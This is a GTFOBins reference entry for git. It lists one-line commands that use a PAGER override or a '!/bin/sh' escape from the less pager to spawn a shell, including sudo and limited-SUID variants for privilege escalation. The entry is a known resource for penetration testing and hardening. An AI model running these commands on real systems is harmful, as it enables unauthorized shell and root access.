GTFOBins.github.io/_gtfobins/git.md
2019-10-25 14:19:18 +02:00

869 B

functions
shell sudo limited-suid
code
PAGER='sh -c "exec sh 0<&1"' git -p help
description code
This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply. git help config !/bin/sh
code
PAGER='sh -c "exec sh 0<&1"' sudo -E git -p help
description code
This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply. sudo git -p help config !/bin/sh
description code
The help system can also be reached from any `git` command, e.g., `git branch`. This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply. sudo git branch --help config !/bin/sh
code
PAGER='sh -c "exec sh 0<&1"' ./git -p help